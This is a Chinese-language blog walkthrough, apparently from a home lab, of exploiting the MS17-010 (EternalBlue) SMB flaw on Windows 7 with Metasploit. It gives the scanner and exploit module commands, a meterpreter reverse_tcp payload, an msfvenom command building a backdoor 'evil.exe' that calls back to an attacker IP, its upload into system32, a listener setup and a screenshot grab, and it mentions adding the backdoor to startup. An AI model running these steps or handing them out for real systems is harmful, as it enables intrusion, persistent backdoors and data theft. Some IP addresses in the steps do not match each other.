利用ms17-010 远程执行漏洞渗透Win7,并留下后门

一、环境准备

主机 kali :192.168.115.134

靶机win7x64:192.168.115.133

二、渗透

Metasploit 指令学习:https://blog.csdn.net/tan6600/article/details/46845793

这里利用的是win7的ms17-010 远程执行漏洞

先使用auxiliary/scanner/smb/smb_ms17_010这个模块进行漏洞的分析,看看这个445端口是否能被入侵

利用ms17-010 远程执行漏洞渗透Win7,并留下后门_第1张图片

先show options查看这个模块的选项,在Required那列中,yes的是必填的,no是选填的,默认帮我们已经写好了大部分的参数,但我们还是要手动设置一下RHOSTS的参数,即指定的主机ip,这里我们写被攻击的win7的ip

set RHOSTS 192.168.115.113

接着输入run执行探测
利用ms17-010 远程执行漏洞渗透Win7,并留下后门_第2张图片

显示表明可以利用该漏洞

开始使用攻击模块

msf > use exploit/windows/smb/ms17_010_eternalblue

msf > set payload windows/x64/meterpreter/reverse_tcp

msf exploit(ms17_010_eternalblue) > set lhost 192.168.115.134

lhost 192.168.115.134

msf exploit(ms17_010_eternalblue) > exploit

利用ms17-010 远程执行漏洞渗透Win7,并留下后门_第3张图片

成功拿到shell

利用ms17-010 远程执行漏洞渗透Win7,并留下后门_第4张图片

二、后门程序

1、用msfvenom生成后门程序

参考:https://blog.csdn.net/itest_2016/article/details/76984455

新版本的msf中已经由msfvenom取代了之前的msfpayload,所以这里我们用msfvenom来生成恶意文件。在/root下生成evil.exe文件。


msfvenom -pwindows/meterpreter/reverse_tcp lhost=192.168.17.26 lport=9999 -f exe > /root/evil.exe

 

利用ms17-010 远程执行漏洞渗透Win7,并留下后门_第5张图片

生成结束之后我们需要把这个后门传递到被攻陷的目标主机,实际中可能是通过webshell、上传漏洞、先导马等等。传递到目标主机之后直接运行既可以得到一个meterpreter回话。这里我们获得了shell利用upload命令将文件传送到靶C:\windows\system32目录下。注意:目标路径要用\\。

利用ms17-010 远程执行漏洞渗透Win7,并留下后门_第6张图片

可以看到靶机下已经接收到了后门程序文件。

利用ms17-010 远程执行漏洞渗透Win7,并留下后门_第7张图片

此时需要现在攻击者的主机上启用监听,来接收来自后门的信息。

注意:我们要断开现在已有的连接

利用ms17-010 远程执行漏洞渗透Win7,并留下后门_第8张图片

启动监听

msf > use exploit/multi/handler 
msf exploit(handler) > set lhost 192.168.115.134
msf exploit(handler) > set lport 9999
msf exploit(handler) > exploit 

利用ms17-010 远程执行漏洞渗透Win7,并留下后门_第9张图片

被攻陷主机运行后门之后:

注意:可以将后门程序附加在开机启动项或者进程中,这里我们在靶机假装不知道它是后门程序双击启动evil.exe

监控端显示有一个连接

利用ms17-010 远程执行漏洞渗透Win7,并留下后门_第10张图片

利用ms17-010 远程执行漏洞渗透Win7,并留下后门_第11张图片

成功得到一个meterpreter会话。

利用ms17-010 远程执行漏洞渗透Win7,并留下后门_第12张图片

这个时候攻击者就可以通过这个meterpreter来执行系统命令、提权、提取敏感数据、内网横向渗透等操作。(当然我都不会2333)

可以用一个有趣的

参考:https://blog.csdn.net/nzjdsds/article/details/77916706

通过

利用ms17-010 远程执行漏洞渗透Win7,并留下后门_第13张图片

利用ms17-010 远程执行漏洞渗透Win7,并留下后门_第14张图片

在/root/AzitvgoJ.jpeg下可以查看到靶机的屏幕截图

利用ms17-010 远程执行漏洞渗透Win7,并留下后门_第15张图片

非常感谢!!!  

你可能感兴趣的:(CVE)